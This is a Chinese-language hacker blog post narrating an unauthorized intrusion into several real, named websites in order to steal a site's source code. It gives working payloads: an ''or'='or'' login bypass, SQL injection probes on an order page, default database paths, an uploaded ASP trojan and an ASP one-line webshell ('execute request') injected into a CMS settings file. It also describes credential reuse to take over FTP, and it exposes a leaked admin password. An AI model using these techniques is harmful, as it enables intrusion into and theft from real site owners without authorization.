绕来绕去的入侵技术 -电脑资料

    入侵原因，

绕来绕去的入侵技术

    我朋友对http://www.059466.com/里的模拟考试程序非常感兴趣，要源码。要源码咱就……

    整体看

    首页应该自己编写的。点连接加’测试注入。发现过滤了，不过过滤了post和get。Cookie应该没过滤。。我也没尝试。换种方法再说。

    先不管了，找下后台。看这个网站有点像企业站。就随便加了个manage目录。。没想到还真有。界面也非常丑陋。http://www.059466.com/manage/Login.asp估计是自己写的。

    ‘or’=’or’

    进去了

    看这菜单。寒心。这样的管理功能能拿到webshell?郁闷。

    于是我犯了一个错误。以为这就是后台。于是我就旁注去了。如果我认真想下前台的功能，就不会这样犯了。这是后话。

    旁注嘛，打开http://www.114best.com/ip/114?w=www.059466.com

    共检测到 36 个网站与www.059466.com在同一IP服务器上

    找啊找啊。http://www.20030.cn/ 的站点。加admin跳后台

    木目下载系统。百度一下。下载一份。查看默认数据库。最后用admin admin登陆进去- -

    管理菜单还是弱弱的

    技术不行，拿不到后台。没考虑用一句话方式。。。

    换站继续http://www.ylpa.net/ 这个也是 在版权处看到Powered By WRMPS v5.0.2 2006-2009 Wangren Inc. 下载一份。按照默认库下载

    可是，本地打开傻眼。

    Wm_password 才十位。。啊们。。。看样子应该是md5后取十位了 看下login.asp代码 找到md5 模块

    MD5=Left(LCase(WordToHex(b) & WordToHex(c)),10)

    果然。。。请教了bs大叔后，知道除了自己写程序跑密码就没其他办法，不过事后我想通过cookie欺骗不知道是否能行？哪位老大知道的说下~

    最终也是放弃了。虽然……

    继续找站。http://www.huayi2008.com

    常规方法没效果。随便点连接，看到了友情连接。

    原来还有sc目录。。。进去看下

    注册登陆。后来发现其实不注册也行，下面有 非会员直接进入 的连接

    还是科讯的产品。。昏了。。直接上传asp木马呢？？？事实告诉我我RP还是不错的。

    上传完毕。可是地址呢。。。竟然没回显。。。晕。现在有个思路就是自己下载一份系统。然后观看上传文件的目录以及文件名的规律。于是百度下 科汛在线输出产品 找到

    http://www.kesion.com/twcs/v2008/ 还真的是科汛的产品。。。发现是收费的。。我XXX。郁闷

    不过订单连接。。

    查看订单，http://www.huayi2008.com/sc/showorder.asp?id=359 加’ 报错。加and 1=1 正常。加and 1=2出错。晕。注入点。。。

    用工具吧。密码没加密 很好。username:huayi2008com

    password:36399796 用这账号登陆就是admin权限。

    订单管理果然看到我们的上传文件。

    http://www.huayi2008.com/sc/system/uploadimages/12.asp

    连接~两分钟后发现shell不见了，

电脑资料

    提权。？。失败了。。。真的没什么思路。SerV-u等第三方软件都没安装。。就安装安全软件。C d e 都不可读。那我们的最开始目标呢？难道不要那源码了？

    绕啊绕啊绕回来

    郁闷 继续看原来的站。http://www.059466.com/ 哦。前台还有留言板。那manage下面为什么没。难道还有真正的后台不成？这是假的》？http://www.059466.com/Admin_Login.asp 晕。随便看下真的还有。。。这个难办了。没账号密码…

    在留言板我看到一张图片。一个细节，决定这次的成功。

    高贝留言？？？解释是？高贝声音留言？？ - -显然不是。这应该是一个cms吧。百度下载。

    果然。。。找到默认数据库。Database\GaoBeiSys_V1x.mdb

    访问目标站。

    晕了。改数据库了？这时我注意到Database\GaoBeiSys_V1x.mdb

    V1x.mdb 1.0的版本？那如果他用2.0呢 不就是Database\GaoBeiSys_V2x.mdb

    …果然。！

    用迅雷下载~啦啦啦啦啦啦。。。本地看密码.跑md5。。耶。出来了、

    进后台发现这系统够强大。

    有数据库备份~太好了。按照我们常规的思路就是上传图片马，备份生成asp。好。不过又是一个难题。

    竟然是空白页面。

    看来upload.asp被管理员删除了。。。这下郁闷了。不过有数据库备份我们可以通过插一句话来。通过查看高贝的源文件。我发现一个重要文件。\Include\Gaobei_Setup.asp

    和后台的系统几本设置一样。就是保存在asp文件。这样我们就有机可乘！

    <%

    Gaobei_Title= "高贝系统 V 2.0"

    我们把高贝系统 V 2.0替换成 “%><%execute request(“fuck”)<%gaobei_fuck=”这样就完全闭合了。然后用一句话连接\Include\Gaobei_Setup.asp.成了！（这步感谢小帅给我那个laker2最小马。郁闷了很久！也鄙视他改主页 =_=）…

    进入后我随便看了下发现有个bbs/的目录，看文件结构是phpwind.我们看下其数据库

    Data/sql_config.php

    这时我突然想到一个问题。就是我们购买虚拟机的时候，ftp的账号和mysql账号密码都是一致的！包括虚拟机的管理页面…果然 登陆ftp成功

    有ftp..要啥有啥。。嘿嘿。。。

    好了好了。。。就是这样了。总结下。

    1.   由于第一次找了一个错误的低功能的后台让我走错了路，旁注失败。服务器权限太死。谁有兴趣提权的找我吖！

    2.   在旁注过程中看到了一个不算很新的密码加密算法。Md5后取前十位，可以借鉴。毕竟现在md5破解弱智密码很简单。如果取前十位。那就难了。

    3.   http://www.huayi2008.com/Chinese/index.asp 看到友情连接，链接到sc/目录。导致此站点的崩溃。

    4.   提权-失败。服务器开启3389端口

    5.   回到原点，认真看前台，发现功能强大，假后台功能弱小。

    6.   看cms的图片分辨出是用哪个cms系统。（这点非常好用！因为你可以改cms的文字，但是有些管理员懒得改图片，要ps掉 版权。以前也用过！）然后通过版本得到数据库路径。